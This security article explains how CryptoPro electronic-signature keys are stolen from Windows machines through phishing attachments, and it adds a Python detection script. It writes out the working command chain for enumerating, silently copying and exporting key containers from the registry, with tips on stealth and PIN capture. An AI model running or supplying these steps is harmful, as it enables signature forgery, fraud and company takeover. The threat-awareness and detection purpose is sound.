Electronic signature leak: how to lose property, money, and a company

Electronic signatures have long been an integral part of corporate processes. They are used to sign crucial documents, confirm transactions, and conduct financial operations. However, at the same time, an electronic signature is not only a convenience but also a serious threat in the case of its compromise. In recent years, attacks on electronic signatures have become increasingly common, with over 90% of such incidents occurring through phishing emails with attachments.

In the era of digitalization of corporate processes, electronic signatures have become an essential tool for confirming the legitimacy of documents. However, in practice, there is a real threat of compromising these signatures, especially through common channels like emails with attachments, through which more than 90% of successful attacks occur.

What can happen when an electronic signature is compromised? Possible consequences:

  • Loss of funds in a bank account. Malicious actors can make illegal transfers by signing all payment documents with your electronic signature. Proving theft will be impossible since all transactions will be legitimately signed and recognized as valid.

  • Loss of property. With the stolen signature, a fake contract can be created, for example, for the sale of company property, leading to significant financial losses.

  • Disruption of deals. If the bank blocks the account due to suspicious transactions, you will not be able to make payments or receive money. Such incidents can stop business operations for an indefinite period, causing deals to fall through.

  • Reputation damage. With a stolen signature, criminals can sign fake tender applications with unfavorable terms. This will not only lead to the cancellation of the deal and inclusion in the list of dishonest suppliers, but also result in financial losses.

  • Hostile takeover of the company. By using the signature of a key employee, criminals can change the charter, appoint a new manager, or weaken the company in other ways, threatening its stability and control.

  • Loss of employee property. Criminals can use the electronic signature to sign fake real estate transactions or other asset deals. If the transaction is recognized as valid, the employee may file a lawsuit against the employer, demanding compensation for the damages, which will hold the company responsible for failing to ensure information security.

The article describes a real, tested mechanism of signature compromise that can lead to serious consequences.

Threat description

Overview:

  1. An employee of the organization receives an email from a supplier. The attachment can be anything—an invoice, reconciliation statement, or claim. Behind the file's facade, there could be:

    • a macro in *.docm;

    • PowerShell script, *.hta or *.vbs;

    • self-extracting archive;

    • or even *.lnk that triggers a chain of calls;

  2. When the attachment is opened on the workstation, a script or executable file is launched that sequentially:

    • Collects a list of installed containers;

    • Copies the container contents into the registry;

    • Extracts key data from the registry;

  3. The data is sent to a remote server, which allows gathering a complete set of cryptographic information for further use.

Technical details of the algorithm

Let's consider the implementation of the algorithm using the Windows operating system as an example, since, despite import substitution, this platform remains the most widely used for electronic document management.

The key dump is carried out in several stages. Each of them may include different mechanisms and additional measures to improve fault tolerance, but the general algorithm is approximately as follows:

Getting the container list through the CryptoPro utility

csptest -keyset -enum_cont -verifycontext -fqcn
CSP (Type:80) v5.0.10008 KC1 Release Ver:5.0.12000 OS:Windows CPU:AMD64 FastCode:READY:AVX.
AcquireContext: OK. HCRYPTPROV: 995157792
\\.\FAT12_E\d58fe6c13-d917-2a53-8e9c-8c4b8158220
OK.
Total: SYS: 0,063 sec USR: 0,016 sec UTC: 0,086 sec
[ErrorCode: 0x00000000]

The output contains the paths to the containers — both local and external. Container names can be easily extracted from it with regular expressions.

Substitution of values and copying containers to the registry

csptest -keycopy -contsrc "<source_container>" -contdest "<destination_container>" -silent
CryptAcquireContext succeeded.HCRYPTPROV: 4014360096
CryptAcquireContext succeeded.HCRYPTPROV: 4014640432
Total: SYS: 0,094 sec USR: 0,094 sec UTC: 0,271 sec
[ErrorCode: 0x00000000]

The command is executed in "silent" mode, which suppresses notifications such as token insertion prompts or password entry requests; this matters for the stealthiness of the operation. Pay attention to the error code — it reports the result of the execution and lets the script branch accordingly. For example:

  • code 0x8009000f — an attempt to copy a password-protected container without specifying a password;

  • 0x8010006e — the user declined the password entry request;

  • 0x00000000 — the operation is successful, you can move to the next stage.

Getting the user's SID

whoami /user

The SID is necessary for determining the registry path where the keys are stored. It, too, can be easily extracted with a regular expression.

Extracting keys from the registry

The keys are extracted using the REG QUERY command, and the SID and container name are substituted into the registry path.

REG QUERY "HKLM\SOFTWARE\WOW6432Node\Crypto Pro\Settings\Users\<SID>\Keys\<container>"
name.key         REG_BINARY    30261624643538...
header.key       REG_BINARY    308205B5308203...
primary.key      REG_BINARY    308205B5308205...
masks.key        REG_BINARY    30360420CA74D3...
primary2.key     REG_BINARY    302204201675D2...
masks2.key       REG_BINARY    303604208A0E18...

The output contains the keys, which will need to be slightly transformed.

Alternatively, you can export the registry branch using REG EXPORT, in which case the data will be exported in a ready-to-use REG file, which can be read or sent in full.

REG EXPORT "HKLM\SOFTWARE\WOW6432Node\Crypto Pro\Settings\Users\<SID>\Keys\<container>" "C:\Users\User\branch.reg"

Sending data to a remote server

Dump files can be sent over the network (HTTP, SMTP, FTP). Such traffic is easy to mask and doesn't raise suspicion.

On the receiving side it is then enough to import the obtained keys into the registry and check that the container is available.
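As an added defender-side example (not code from the article), the following Python script turns the stages above into detection rules and runs them over constructed Sysmon-style process-creation events. Host names, user names, the SID and the container names are made up; the key discriminators are `csptest -keycopy ... -silent`, `reg` access to the `Crypto Pro\Settings\Users\...\Keys` branch, and a script host or Office process as the parent.

```python
import re
from collections import defaultdict

def ev(ts, host, user, parent, cmd):
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
EVENTS = [
    ev(101, "ws01", "CORP\\ivanov", "wscript.exe", "csptest -keyset -enum_cont -verifycontext -fqcn"),
    ev(103, "ws01", "CORP\\ivanov", "wscript.exe", 'csptest -keycopy -contsrc "\\\\.\\FAT12_E\\cont1" -contdest "cont1copy" -silent'),
    ev(104, "ws01", "CORP\\ivanov", "wscript.exe", "whoami /user"),
    ev(106, "ws01", "CORP\\ivanov", "wscript.exe",
       'REG EXPORT "HKLM\\SOFTWARE\\WOW6432Node\\Crypto Pro\\Settings\\Users\\S-1-5-21-1\\Keys\\cont1" "C:\\Users\\ivanov\\branch.reg"'),
    # Benign baseline: an administrator enumerating containers from an interactive console.
    ev(500, "ws02", "CORP\\admin", "cmd.exe", "csptest -keyset -enum_cont -verifycontext -fqcn"),
]

# One pattern per stage of the chain; -silent is the discriminator for an unattended copy.
STAGES = [
    ("enum_containers", re.compile(r"csptest.*-enum_cont", re.I)),
    ("silent_keycopy",  re.compile(r"csptest.*-keycopy.*-silent", re.I)),
    ("sid_lookup",      re.compile(r"^whoami(\.exe)?\s+/user", re.I)),
    ("registry_keys",   re.compile(r"reg(\.exe)?\s+(query|export).*crypto pro\\settings\\users\\.*\\keys", re.I)),
]
# Parents that should not be driving CSP tooling: Office applications and script hosts.
SCRIPT_PARENTS = {"winword.exe", "excel.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
WINDOW = 300  # seconds; the stages of one dump run land close together

def classify(event):
    for name, rx in STAGES:
        if rx.search(event["cmd"]):
            return name
    return None

def detect(events):
    # Group stage hits per (host, user) inside WINDOW and rate the chain.
    by_actor = defaultdict(list)
    for e in sorted(events, key=lambda x: x["ts"]):
        if (stage := classify(e)):
            by_actor[(e["host"], e["user"])].append((e["ts"], stage, e["parent"].lower()))
    alerts = []
    for (host, user), hits in by_actor.items():
        first = hits[0][0]
        stages = sorted({s for t, s, _ in hits if t - first <= WINDOW})
        scripted = any(p in SCRIPT_PARENTS for _, _, p in hits)
        if "silent_keycopy" in stages or "registry_keys" in stages:
            severity = "high"      # keys are being copied or read out of the registry
        elif scripted or len(stages) >= 2:
            severity = "medium"    # enumeration from a script host, or several stages seen
        else:
            severity = "low"       # single interactive enumeration, likely administrative work
        alerts.append({"host": host, "user": user, "stages": stages, "severity": severity})
    return alerts
```

Hunting the same patterns in existing EDR or SIEM data (command line plus parent process) is enough to catch this chain; the registry branch itself can additionally be audited for writes.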

Alternative vector: using digital signatures without copying

Even if the container cannot be copied (for example, it is marked as non-exportable), the attacker can use the cryptographic provider to locally sign documents and send them to a remote server. This is especially dangerous because it does not require breaking the token but compromises its owner.

PIN-code? We'll just wait

Based on the error codes, the script can determine that the container is password-protected and switch to a waiting mode in which it waits for the user to enter the password (e.g., a 4–8 digit PIN).

This is not brute-force — it's passive listening.

Which languages are used

The algorithm can be implemented in any language capable of executing commands, working with the command line, and sending HTTP requests.

The most commonly used are:

  • C / C++

  • PowerShell

  • Python

  • VBS

Conclusion

The presented mechanism is not a hypothesis, but a proven algorithm successfully tested on a lab bench. The threat of digital signature leakage and its remote use is real, and underestimating it can lead to serious consequences.

A signature can not only be copied, but also used without the owner's knowledge, bypassing complex exploits and deceiving security systems without the need to hire hackers from the darknet.

The algorithm described in the article is simple to implement and does not require deep technical knowledge. With modern tools such as ChatGPT, the entire process can be automated — from parsing data to converting it.
